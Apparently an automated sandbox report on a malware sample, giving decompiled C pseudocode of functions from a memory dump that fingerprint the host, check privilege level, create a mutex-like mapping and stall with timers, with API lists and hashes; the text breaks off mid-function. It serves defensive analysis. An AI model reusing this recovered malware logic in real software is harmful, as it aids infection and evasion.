0x012b5544
0x012b5547
0x012b554a
0x00000000
0x012b554c
0x012b555b
0x012b555b
0x00000000
0x012b5589
0x012b5589
0x012b558e
0x012b55ad
0x012b55af
0x012b55b4
0x012b55b5
0x00000000
0x012b5590
0x012b5590
0x012b5596
0x00000000
0x012b5598
0x012b5598
0x012b559d
0x012b559f
0x012b55a4
0x012b55a5
0x012b55bb
0x012b55bb
0x012b55c3
0x012b55ce
0x012b55d1
0x012b55dc
0x012b55de
0x012b55e1
0x012b55e3
0x00000000
0x012b55e9
0x00000000
0x012b55e9
0x012b55e3
0x012b5596
0x00000000
0x012b558e
0x012b555e
0x012b5560
0x012b5563
0x012b5564
0x012b5564
0x012b5568
0x012b5572
0x012b5572
0x012b5578
0x012b557b
0x012b557b
0x012b5581
0x012b5581
0x012b55fe
0x00000000

APIs

memset.NTDLL ref: 012B5476
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 012B5482
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 012B54A7
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 012B54C3
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 012B54DC
HeapFree.KERNEL32(00000000,00000000), ref: 012B5572
CloseHandle.KERNEL32(?), ref: 012B5581
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 012B55BB
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,012B53C9,?), ref: 012B55D1
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 012B55DC

Part of subcall function 012B502E: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05249370,00000000,?,7519F710,00000000,7519F730), ref: 012B507D
Part of subcall function 012B502E: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,052493A8,?,00000000,30314549,00000014,004F0053,05249364), ref: 012B511A
Part of subcall function 012B502E: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,012B54EF), ref: 012B512C

GetLastError.KERNEL32 ref: 012B55EE

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID:
API String ID: 3521023985-0
Opcode ID: c38c0354c71eedd04df6f41af2d3f559897aa686af930d846d96c6896e4f2e02
Instruction ID: bca2b2a53e7dcc84650cf0bec887ca473549ed985bb66c905b66975045602d68
Opcode Fuzzy Hash: c38c0354c71eedd04df6f41af2d3f559897aa686af930d846d96c6896e4f2e02
Instruction Fuzzy Hash: D7517CB1811229ABDF21DF98ECC8DEEBFB9EF09360F104515F515E6185D7709640CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 012B3598, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E012B3598(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L012BAECA();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x12bd2e0; // 0x3f8a5a8
				_t5 = _t13 + 0x12be876; // 0x5248e1e
				_t6 = _t13 + 0x12be59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L012BABEA();
				_t17 = CreateFileMappingW(0xffffffff, 0x12bd2e4, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x012b3598
0x012b35a0
0x012b35a4
0x012b35aa
0x012b35af
0x012b35b4
0x012b35b7
0x012b35ba
0x012b35bf
0x012b35c0
0x012b35c3
0x012b35c8
0x012b35cf
0x012b35d9
0x012b35db
0x012b35dc
0x012b35df
0x012b35fb
0x012b3601
0x012b3605
0x012b3653
0x012b3607
0x012b3614
0x012b3624
0x012b362c
0x012b363e
0x012b3642
0x00000000
0x00000000
0x012b362e
0x012b3631
0x012b3636
0x012b3638
0x012b3638
0x012b3616
0x012b3618
0x012b3644
0x012b3645
0x012b3645
0x012b3614
0x012b365a

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,012B529C,?,?,4D283A53,?,?), ref: 012B35A4
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 012B35BA
_snwprintf.NTDLL ref: 012B35DF
CreateFileMappingW.KERNELBASE(000000FF,012BD2E4,00000004,00000000,00001000,?), ref: 012B35FB
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,012B529C,?,?,4D283A53), ref: 012B360D
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 012B3624
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,012B529C,?,?), ref: 012B3645
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,012B529C,?,?,4D283A53), ref: 012B364D

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: 0ed3b59fe5349cae04ba041b50dd0eef224280c01a9ebff7b22993660c553198
Instruction ID: 1c741d7651a68674d9eec1a423f6ec258cbb6e2d05ca527d7e0a5462418bfa85
Opcode Fuzzy Hash: 0ed3b59fe5349cae04ba041b50dd0eef224280c01a9ebff7b22993660c553198
Instruction Fuzzy Hash: 50210572610208BFD721DF68DCC9FDD37A9BB54794F150021F705E7281EA70D9058B54

Uniqueness

Uniqueness Score: -1.00%

Function 012BA82B, Relevance: 12.1, APIs: 8, Instructions: 103
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E012BA82B(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x12bd2a8; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E012B60B6( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x12bd2dc ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x12bd270, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E012B789B(_v8 + _v8, _t64);
							}
							HeapFree( *0x12bd270, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x12bd270, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E012B789B(_v8 + _v8, _t64);
						}
						HeapFree( *0x12bd270, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}

0x012ba82b
0x012ba833
0x012ba837
0x012ba83a
0x012ba83f
0x012ba841
0x012ba846
0x012ba846
0x012ba84c
0x012ba84e
0x012ba85b
0x012ba8bc
0x012ba85d
0x012ba862
0x012ba868
0x012ba86d
0x012ba87b
0x012ba87f
0x012ba88e
0x012ba895
0x012ba89c
0x012ba89c
0x012ba8a7
0x012ba8a7
0x012ba87f
0x012ba86d
0x012ba8be
0x012ba8c4
0x012ba8ce
0x012ba8d0
0x012ba8d5
0x012ba8e4
0x012ba8e8
0x012ba8f3
0x012ba8fa
0x012ba901
0x012ba901
0x012ba90d
0x012ba90d
0x012ba8e8
0x012ba918
0x012ba91a
0x012ba91d
0x012ba91f
0x012ba922
0x012ba925
0x012ba92f
0x012ba933
0x012ba937

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 012BA862
RtlAllocateHeap.NTDLL(00000000,?), ref: 012BA879
GetUserNameW.ADVAPI32(00000000,?), ref: 012BA886
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,012B538B), ref: 012BA8A7
GetComputerNameW.KERNEL32(00000000,00000000), ref: 012BA8CE
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 012BA8E2
GetComputerNameW.KERNEL32(00000000,00000000), ref: 012BA8EF
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,012B538B), ref: 012BA90D

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID:
API String ID: 3239747167-0
Opcode ID: f9e79496f05612f2a6c661657246bb03551022021e6f2b704998045f52e3611e
Instruction ID: 512c6c209f5def1643e4d02e89472b9b87b045f342557e13054598c54fcff50d
Opcode Fuzzy Hash: f9e79496f05612f2a6c661657246bb03551022021e6f2b704998045f52e3611e
Instruction Fuzzy Hash: 88311B71A1020AEFEB20DFA9DDC5AAEBBF9FB48354F114469E605D3215EB30DE419B10

Uniqueness

Uniqueness Score: -1.00%

Function 012B4151, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012B4151(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x12bd294 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E012B75F6(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E012B4AAB(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x012b415e
0x012b4165
0x012b416c
0x012b4180
0x012b418b
0x012b41a3
0x012b41b0
0x012b41b3
0x012b41b8
0x012b41c3
0x012b41c7
0x012b41d6
0x012b41da
0x012b41f6
0x012b41f6
0x012b41fa
0x012b41fa
0x012b41ff
0x012b4203
0x012b4209
0x012b420a
0x012b4211
0x012b4217

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 012B4183
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 012B41A3
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 012B41B3
CloseHandle.KERNEL32(00000000), ref: 012B4203

Part of subcall function 012B75F6: RtlAllocateHeap.NTDLL(00000000,00000000,012B4F70), ref: 012B7602

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 012B41D6
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 012B41DE
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 012B41EE

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: 29e62055c7cfa90090b3e2673b08d1066d396a50e826413130cbff736e049da0
Instruction ID: 14d08a2bcfbaee13ccf02f08108bf803a39caf37d1441d3da0d1a1edfb3c7682
Opcode Fuzzy Hash: 29e62055c7cfa90090b3e2673b08d1066d396a50e826413130cbff736e049da0
Instruction Fuzzy Hash: 33217F7590024EFFEB10AF94DCC4EEEBFB9EF48344F000066EA11A6291C7719A05EB60

Uniqueness

Uniqueness Score: -1.00%

Function 012B262F, Relevance: 9.1, APIs: 6, Instructions: 61
sleepmemorytimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E012B262F(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t27;
				signed int _t34;

				_t27 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0x12bd270 = _t10;
				if(_t10 != 0) {
					 *0x12bd160 = GetTickCount();
					_t12 = E012B1A24(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
							_push(0);
							_push(0x13);
							_push(_t23 >> 5);
							_push(_t16);
							L012BB02E();
							_t34 = _t14 + _t16;
							_t18 = E012B4F23(_a4, _t34);
							_t19 = 3;
							_t26 = _t34 & 0x00000007;
							Sleep(_t19 << (_t34 & 0x00000007)); // executed
						} while (_t18 == 1);
						if(E012B27C7(_t26) != 0) {
							 *0x12bd298 = 1; // executed
						}
						_t12 = E012B520D(_t27); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}

0x012b262f
0x012b2635
0x012b2636
0x012b2642
0x012b2648
0x012b264f
0x012b265f
0x012b2664
0x012b266b
0x012b266d
0x012b2672
0x012b2678
0x012b267e
0x012b2688
0x012b268c
0x012b268e
0x012b2693
0x012b2694
0x012b2695
0x012b269a
0x012b26a0
0x012b26ab
0x012b26ac
0x012b26b2
0x012b26b8
0x012b26c4
0x012b26c6
0x012b26c6
0x012b26d0
0x012b26d0
0x012b2651
0x012b2653
0x012b2653
0x012b26da

APIs

HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,012B1900,?), ref: 012B2642
GetTickCount.KERNEL32 ref: 012B2656
GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,012B1900,?), ref: 012B2672
SwitchToThread.KERNEL32(?,00000001,?,?,?,012B1900,?), ref: 012B2678
_aullrem.NTDLL(?,?,00000013,00000000), ref: 012B2695
Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,012B1900,?), ref: 012B26B2

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
String ID:
API String ID: 507476733-0
Opcode ID: aa54c9560ace4c21ee390b96569cb9f2a2dede171714c7a645256848958fc032
Instruction ID: 57fe75a1f7d517204604dba139495153964ea41a415ec4b9a71d5a4e39451238
Opcode Fuzzy Hash: aa54c9560ace4c21ee390b96569cb9f2a2dede171714c7a645256848958fc032
Instruction Fuzzy Hash: 5811CA72A60309AFD7245BB4EC8DFEA779CDB443D0F000525FA45C6184EAB4E44087A0

Uniqueness

Uniqueness Score: -1.00%

Function 012B520D, Relevance: 7.7, APIs: 5, Instructions: 159
memoryCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E012B520D(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E012B154A();
				if(_t21 != 0) {
					_t59 =  *0x12bd294; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x12bd294 = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x12bd12c(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E012B21DE( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x12bd2e0; // 0x3f8a5a8
					if( *0x12bd294 > 5) {
						_t8 = _t26 + 0x12be5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x12be9f9; // 0x44283a44
						_t27 = _t7;
					}
					E012B11F4(_t27, _t27);
					_t31 = E012B3598(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0x12bd2a8 =  *0x12bd2a8 ^ 0x81bbe65d;
						_t32 = E012B75F6(0x60);
						 *0x12bd364 = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x12bd364; // 0x52495b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x12bd364; // 0x52495b0
							 *_t51 = 0x12be823;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x12bd270, 0, 0x43);
							 *0x12bd300 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x12bd294; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x12bd2e0; // 0x3f8a5a8
								_t13 = _t58 + 0x12be55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x12bc2a7);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E012BA82B( ~_v8 &  *0x12bd2a8, 0x12bd00c); // executed
								_t42 = E012B4C40(_t55); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E012B74A5(); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E012B5461(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E012B3FC2(__eflags,  &(_t65[4]));
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x12bd128();
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E012B5AB2(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}

0x012b520d
0x012b5218
0x012b521b
0x012b521e
0x012b5221
0x012b5228
0x012b522a
0x012b5236
0x012b5238
0x012b5238
0x012b5241
0x012b5247
0x012b524c
0x012b5266
0x012b5272
0x012b5274
0x012b5279
0x012b5283
0x012b5283
0x012b527b
0x012b527b
0x012b527b
0x012b527b
0x012b528a
0x012b5297
0x012b529e
0x012b52a3
0x012b52a3
0x012b52ab
0x012b52ae
0x012b52d4
0x012b52e0
0x012b52e5
0x012b52ea
0x012b52ec
0x012b5318
0x012b531a
0x012b52ee
0x012b52f2
0x012b52f7
0x012b52fc
0x012b5303
0x012b5309
0x012b530e
0x012b5314
0x012b531b
0x012b531d
0x012b531f
0x012b532e
0x012b5334
0x012b5339
0x012b533b
0x012b536b
0x012b536d
0x012b533d
0x012b533d
0x012b5343
0x012b5350
0x012b5356
0x012b5356
0x012b535e
0x012b5367
0x012b536e
0x012b5370
0x012b5372
0x012b5379
0x012b5386
0x012b538b
0x012b5390
0x012b5392
0x012b5394
0x00000000
0x00000000
0x012b5396
0x012b539b
0x012b539d
0x012b53a4
0x012b53a8
0x012b53ab
0x012b53c0
0x012b53c4
0x012b53c9
0x00000000
0x012b53c9
0x012b53ad
0x012b53af
0x00000000
0x00000000
0x012b53ba
0x012b53bc
0x012b53be
0x00000000
0x00000000
0x00000000
0x012b53be
0x012b53a1
0x012b53a1
0x012b5372
0x012b52b0
0x012b52b0
0x012b52b5
0x012b53cb
0x012b53cf
0x012b53d7
0x012b53d7
0x00000000
0x012b53cf
0x012b52bb
0x012b52be
0x012b52c8
0x012b52cf
0x00000000
0x012b53df
0x012b53df
0x012b53e3
0x012b53e7
0x012b53e7

APIs

Part of subcall function 012B154A: GetModuleHandleA.KERNEL32(4C44544E,00000000,012B5226,00000000,00000000), ref: 012B1559

CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 012B52A3

Part of subcall function 012B75F6: RtlAllocateHeap.NTDLL(00000000,00000000,012B4F70), ref: 012B7602

memset.NTDLL ref: 012B52F2
RtlInitializeCriticalSection.NTDLL(05249570), ref: 012B5303

Part of subcall function 012B3FC2: memset.NTDLL ref: 012B3FD7
Part of subcall function 012B3FC2: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 012B4019
Part of subcall function 012B3FC2: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 012B4024

RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 012B532E
wsprintfA.USER32 ref: 012B535E

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
String ID:
API String ID: 4246211962-0
Opcode ID: 362abbafd9c7571e6955918b3be8de67fbf40dadbf00fdd6a1ccc608d8269af6
Instruction ID: b93e1c58597678800e754227d1d633cfa7ae15ca39f33fcd21a473d917bc8075
Opcode Fuzzy Hash: 362abbafd9c7571e6955918b3be8de67fbf40dadbf00fdd6a1ccc608d8269af6
Instruction Fuzzy Hash: 28513D70A3231AAFDB219BF4E8D9BEE77B8AB04794F040425F701DB242D3B495848B50

Uniqueness

Uniqueness Score: -1.00%

Function 012B78E6, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145
stringCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E012B78E6(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E012B75F6(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E012B4AAB(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E012B75F6((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x12bd2b0 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}

0x012b78ed
0x012b78f4
0x012b78f9
0x012b78fc
0x012b7903
0x012b7906
0x012b7909
0x012b790e
0x012b7913
0x012b7a67
0x012b7a69
0x012b7a6b
0x012b7a70
0x012b7a70
0x012b7919
0x012b791c
0x012b791f
0x012b7921
0x012b7921
0x012b7925
0x00000000
0x00000000
0x012b7929
0x012b7955
0x012b795a
0x012b795c
0x012b795c
0x012b795f
0x012b7962
0x012b7962
0x012b7964
0x00000000
0x012b792f
0x012b7931
0x012b7950
0x012b7950
0x012b7967
0x012b7967
0x012b7968
0x012b7968
0x012b796b
0x00000000
0x00000000
0x00000000
0x012b796b
0x012b7935
0x012b797c
0x012b7980
0x012b7a5a
0x012b7a5c
0x012b7a5c
0x012b7a5d
0x012b7a60
0x00000000
0x012b7a60
0x012b7989
0x012b799a
0x012b799e
0x012b7a56
0x00000000
0x012b7a56
0x012b79a4
0x012b79a7
0x012b79ab
